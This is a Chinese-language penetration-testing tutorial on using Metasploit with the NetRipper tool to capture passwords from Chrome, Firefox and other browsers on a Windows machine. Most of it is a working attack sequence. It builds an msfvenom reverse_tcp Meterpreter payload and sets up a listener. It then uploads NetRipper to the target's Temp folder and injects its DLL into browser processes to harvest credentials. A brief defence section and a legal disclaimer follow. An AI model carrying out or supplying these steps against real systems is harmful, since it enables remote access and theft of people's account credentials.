Metasploit+NetRipper获取Chrome等浏览器帐号密码测试
字数 1170 2025-08-18 11:37:15
Metasploit+NetRipper获取浏览器保存密码的完整指南
前言
本教程将详细介绍如何使用Metasploit框架结合NetRipper工具获取Chrome等浏览器中保存的账号密码。这种方法适用于渗透测试和安全研究,请确保在合法授权范围内使用。
准备工作
所需工具
- Kali Linux系统(已预装Metasploit)
- NetRipper工具(需自行下载配置)
环境配置
- 下载并配置NetRipper:
git clone https://github.com/NytroRST/NetRipper.git
mkdir -p /usr/share/metasploit-framework/modules/post/windows/gather/netripper
cp NetRipper/netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper/
cp NetRipper/DLL.x86.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/
cp NetRipper/NetRipper.x86.exe /usr/share/metasploit-framework/modules/post/windows/gather/netripper/
cp NetRipper/DLL.x64.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/
cp NetRipper/NetRipper.x64.exe /usr/share/metasploit-framework/modules/post/windows/gather/netripper/
操作步骤
1. 生成Payload
使用msfvenom生成Windows可执行Payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your_IP> LPORT=<Port> -f exe > Payload.exe
将<Your_IP>替换为你的Kali Linux IP地址,<Port>替换为任意可用端口。
2. 设置Metasploit监听
启动Metasploit并配置监听:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Your_IP>
set LPORT <Port>
options
exploit
3. 目标机执行Payload
将生成的Payload.exe在目标Windows机器上运行,建立Meterpreter会话。
4. 上传NetRipper文件
在Meterpreter会话中上传必要文件:
upload /root/Desktop/NetRipper/x64/DLL.dll "C:\\Users\\Administrator\\AppData\\Local\\Temp"
upload /root/Desktop/NetRipper/x64/NetRipper.exe "C:\\Users\\Administrator\\AppData\\Local\\Temp"
5. 执行NetRipper
在Meterpreter会话中执行:
shell
cd C:\Users\Administrator\AppData\Local\Temp
NetRipper.exe
6. 注入浏览器进程
针对Chrome浏览器注入:
NetRipper.exe --w DLL.dll --l TEMP --p true --d 4096 --s user,pass
NetRipper.exe ConfiguredDLL.dll chrome.exe
也可以替换chrome.exe为其他浏览器进程名,如:
firefox.exe(火狐浏览器)360se.exe(360浏览器)qqbrowser.exe(QQ浏览器)
获取密码
- NetRipper会将捕获的数据保存在临时目录的txt文件中
- 使用文本编辑器打开该文件
- 使用搜索功能(Ctrl+F)查找关键词:
pwpwpwdpasspassworduserusername
可能遇到的问题及解决方案
-
获取失败的可能原因:
- 网站使用了HTTPS协议
- 登录时在本地进行了账号口令的加密混淆
- 浏览器使用了额外的加密存储机制
-
解决方法:
- 尝试注入其他浏览器进程
- 检查NetRipper参数设置
- 确保目标浏览器正在运行
防范措施
-
用户防范建议:
- 不要点击来历不明的文件
- 使用二维码扫描登录代替保存密码
- 避免在浏览器中保存重要账号密码
- 定期清理浏览器保存的密码
-
企业防护建议:
- 部署终端防护软件
- 监控异常进程注入行为
- 限制敏感数据的本地存储
技术原理
NetRipper通过DLL注入技术挂钩目标进程的加密/解密API函数,截获浏览器处理密码时的内存数据。它特别针对以下场景有效:
- 浏览器自动填充密码时
- 用户手动输入密码时
- 浏览器与密码管理器交互时
扩展应用
此技术不仅适用于浏览器密码获取,还可用于:
- 其他密码管理软件的研究
- 加密通信的中间人攻击研究
- 内存敏感数据分析
法律声明
本教程仅用于合法安全研究和授权渗透测试。未经授权对他人系统进行此类操作可能违反法律,使用者需自行承担法律责任。